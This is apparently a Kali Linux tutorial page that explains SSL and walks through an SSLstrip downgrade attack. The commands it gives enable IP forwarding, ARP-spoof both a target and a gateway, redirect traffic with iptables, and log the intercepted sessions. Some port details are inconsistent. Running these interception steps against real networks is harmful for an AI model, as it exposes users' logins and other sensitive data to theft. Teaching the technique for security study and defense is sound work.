Mastering SSLStrip Analysis: Uncovering Hidden Vulnerabilities

What is SSL (secure socket layer)?

SSL analysis (Secure Socket Layer) is a standard security technology used for establishing an encrypted channel between a server and a client. For example a web server (website) and a browser; or a mail server and a mail client.

SSL allows sensitive information such as credit card numbers, social security numbers, and login credentials to be transmitted securely. Normally, data sent between browsers and web servers is sent in plain text—leaving you vulnerable to eavesdropping. If an attacker is able to intercept (capture) all data being sent over the internet between a browser and a web server they can see and use that information. Http is sent data in plain text over a network. HTTPS protocol is used for establishing secure channel between browser (client) and the web server.

More specifically, SSL is a security protocol. Protocols describe how algorithms should be used; in this case, the SSL protocol determines variables of the encryption for both the link and the data being transmitted.

More detail https://www.digicert.com/ssl.htm

What sslstrip?

Sslstrip is a tool used to downgrade HTTPS to HTTP. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.

How does sslstrip work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send the attacker all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

SSLstrip example
2 ssl exaple

Running sslstrip

Step 1: Enable port forwarding

echo “1” > /proc/sys/net/ipv4/ip_forward

2 arp spoof

Step 2: Findout network gateway

netstat –r

sslstrip netstat -r

Step 3: Spoof MAC address with gateway MAC address using arpspoof

arpspoof -i <interface> -t <targetIP> <gatewayIP>

arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

Open new terminal and run following command

arpspoof -i eth0 -t 192.168.1.1 192.168.1.5

Step 4: Setup iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 8080 -j REDIRECT –to-port <listenPort>

iptables -t nat -A PREROUTING -p tcp –destination-port 8080 -j REDIRECT –to-port 1000

Step 5:  Write the results to a file (-w sslstrip.log), listening on port 1000 (-l 1000):

Sslstrip –w sslstrip.txt –l 1000

MODULE 6:- Enumeration

  1. Secure Socket Layer SSL analysis with sslstrip in Kali Linux
  2. SNMP Enumeration Kali by snmpwalk tool and snmpenum
  3. nbtscan and nmap “nbtstat -s” For SMB scanning

If you like our content, please consider buying us a coffee.
Thank you for your support!

Leave a Reply

Your email address will not be published. Required fields are marked *